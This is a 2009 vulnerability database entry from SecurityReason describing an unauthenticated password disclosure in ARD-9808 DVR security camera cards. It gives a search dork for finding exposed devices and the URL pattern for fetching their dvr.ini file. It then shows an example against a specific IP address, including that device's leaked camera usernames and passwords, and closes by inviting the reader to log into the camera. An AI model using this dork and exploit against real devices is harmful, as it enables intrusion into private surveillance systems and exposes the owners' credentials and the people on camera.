SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

ARD-9808 DVR Card Security Camera Passwords View Bug


Arrow  WLB : WLB-2009070007  (About)
Arrow  SecurityAlert : 6008
Arrow  Date : 2009-07-04
Arrow  Credit          : Septemb0x
Arrow  Added by     : SecurityReason
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History : [2009-07-04] Started

Arrow  Affected software :  ARD-9808 DVR Card Security Camera



Arrow  Text :  

-------------------------------------------------
SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug
-------------------------------------------------
Author : Septemb0x
Web Site : www.ozkanbozkurt.com
Procuts Site :
http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080
A46FD&id=87789673
Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open
To Rar > DVR > Dvr.ini
D0rk : "To enable control work: Tools->Internet
Options->Security->Custom Level Reset to: Low Or Download"
-------------------------------------------------
Exploit: http://[sitename-ipadress]/dvr.ini
-------------------------------------------------
Example: http://88.249.248.177/dvr.ini
Show;
[PASSWORD]
administrator=
password_a=
user=
password=
enable=0
user0=ozcan = Camera Username
password0=3893 = Camera Password
right0=223
encode=1
num=2
user1=yurt
password1=yurt
right1=223
.
.
.
... Login The Camera :)
-------------------------------------------------
Greetz : BHDR, BARCOD3
-------------------------------------------------



Arrow  References :  

no

If you want change this note, please use UCP


Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

Copyright © SecurityReason.com. All Rights Reserved.